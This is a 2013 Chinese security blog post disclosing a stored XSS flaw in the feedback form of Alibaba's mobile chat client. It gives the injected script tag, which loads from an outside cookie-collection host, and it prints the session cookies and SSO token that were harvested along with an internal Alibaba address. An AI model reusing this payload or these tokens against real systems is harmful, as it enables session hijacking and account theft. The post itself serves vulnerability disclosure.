阿峰博客 阿峰'S blog

  • 首页
  • 移动安全
    • Android安全
    • iOS安全
    • APP安全
  • 新闻资讯
    • IT新闻
    • 安全资讯
  • 信息安全
    • WEB安全
    • 系统安全
    • 终端安全
    • 安全工具
  • 建站优化
    • 网站优化
    • 网络营销
  • 资源共享
  • 关于博客
    • 申请友链
    • 在线投稿
不忘初心,砥砺前行。
  1. 首页
  2. 信息安全
  3. 正文

阿里巴巴存在储存型xss漏洞可获得cookies

2013 年 1 月 24 日 1730点热度 0人点赞 0条评论

发现漏洞后提交到乌云了,今天阿里巴巴确认了,就发到博客吧。

简要描述:

xss漏洞,大家都懂的,可获得cookies

详细说明:

只是抱着试试看的态度,没想到真的出现了...
该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。
测试版本为手机iphone版,
在软件的【反馈】里写入xss测试代码,
<script src="http://xss.sh3llc0de.com/?u=ddc05c"></script>
提交成功。
十分钟之内没有收到cookies,就失望了,但刚才去看了看...哈哈。

漏洞证明:

ali.png
信息
IP:121.0.29.205
地址:中国浙江杭州电信企业阿里巴巴公司
操作系统:Windows XP
浏览器:Chrome 24.0.1312.52
时间:2013-01-22 19:06:45

cookies

USER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1

CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk

 

地址:http://mops.alibaba-inc.com/usersuggestion/index.do?pageIndex=2&source=ios&whiltelist=false

没什么技术含量,纯属盲打,期待阿里巴巴的礼物...

标签: 阿里巴巴xss
最后更新:2013 年 1 月 24 日

阿峰

保持饥渴的专注,追求最佳的品质

点赞
< 上一篇
下一篇 >

文章评论

取消回复

标签聚合
网络安全 perl 端口扫描 关键字 工具 xss漏洞 Wordpress 渗透测试
最新 热点 随机
最新 热点 随机
安卓批量搜索分析Java 类/对象结构脚本工具 MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 Joy:一款用于捕获和分析网络内部流量数据的工具 One-Lin3r:懒人的福音,渗透测试单行化工具 EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 国产网站恶意代码监测(网马监控)工具优化版
MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用安卓批量搜索分析Java 类/对象结构脚本工具
前半部分让我笑得不行了,后面让我哭的不行了 入侵检测工具Snort的基本命令 苹果mac os x修复bash漏洞推出下载补丁 CryKeX:Linux内存加密密钥提取工具 Cain嗅探的RDP包批量解析脚本导出用户名+密码 敲诈者病毒新变种:山寨版CTB-Locker技术分析(附解密方法)
最近评论
发布于 2 年前(07月07日) 小哥,可以帮忙把我的友链修改为 https://feifanblog.com 么?谢谢啦~
发布于 3 年前(07月23日) top.document.body.innerHTML=""; 这个是1.js 还是xss ...
发布于 3 年前(11月22日) 看错了,还以为是你买的register.com呢。。。
发布于 3 年前(10月22日) 大佬 求sql 放正系统注入工具
发布于 4 年前(05月27日) 感觉还是非常复杂的呢。。。。

COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.

本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。